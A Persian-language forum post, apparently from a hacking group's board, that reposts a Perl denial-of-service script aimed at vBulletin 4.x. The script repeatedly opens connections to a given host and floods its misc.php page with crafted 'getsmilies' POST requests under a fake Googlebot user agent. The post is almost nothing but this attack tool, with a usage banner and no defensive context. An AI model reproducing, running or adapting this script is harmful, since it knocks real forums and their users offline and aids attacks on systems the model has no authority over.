SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Vbulletin misc Page Denial of Service

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Vbulletin misc Page Denial of Service

    [php]#!/usr/bin/perl
    #####################################
    # Vbulletin misc Page Denial of Service
    # Version: 4.*.*
    # Code Written By Amir
    # Site : Www.IrIsT.Ir - Www.IrIsT.Ir/forum - Www.IrIsT.Ir/en
    # Facebook Page : https://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573
    # Greats : All Member In IrIsT.Ir
    #####################################
    use IO::Socket;

    $host = $ARGV[0];
    $path = $ARGV[1];

    if(!$ARGV[1])
    {
    print "############################################# #### \n";
    print "## Vbulletin misc Page Denial of Service\n";
    print "## Discoverd By Amir \n";
    print "## Www.IrIsT.Ir \n";
    print "############################################# #### \n";
    print "## [host] [path] \n";
    print "## host.com /Vbulletin/\n";
    print "############################################# #### \n";
    exit();
    }
    for($i=0; $i<99999; $i++)
    {
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
    $post = "do=getsmilies&result=%0%0%0%0%0%0%0";
    $pack.= "POST " .$path. "/misc.php HTTP/1.1\r\n";
    $pack.= "Host: " .$host. "\r\n";
    $pack.= "User-Agent: Googlebot/2.1\r\n";
    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $pack.= "Content-Length: " .length($post). "\r\n\r\n";
    $pack.= $post;
    print $socket $pack;
    syswrite STDOUT, "*";
    } [/php]
صبر کنید ..
X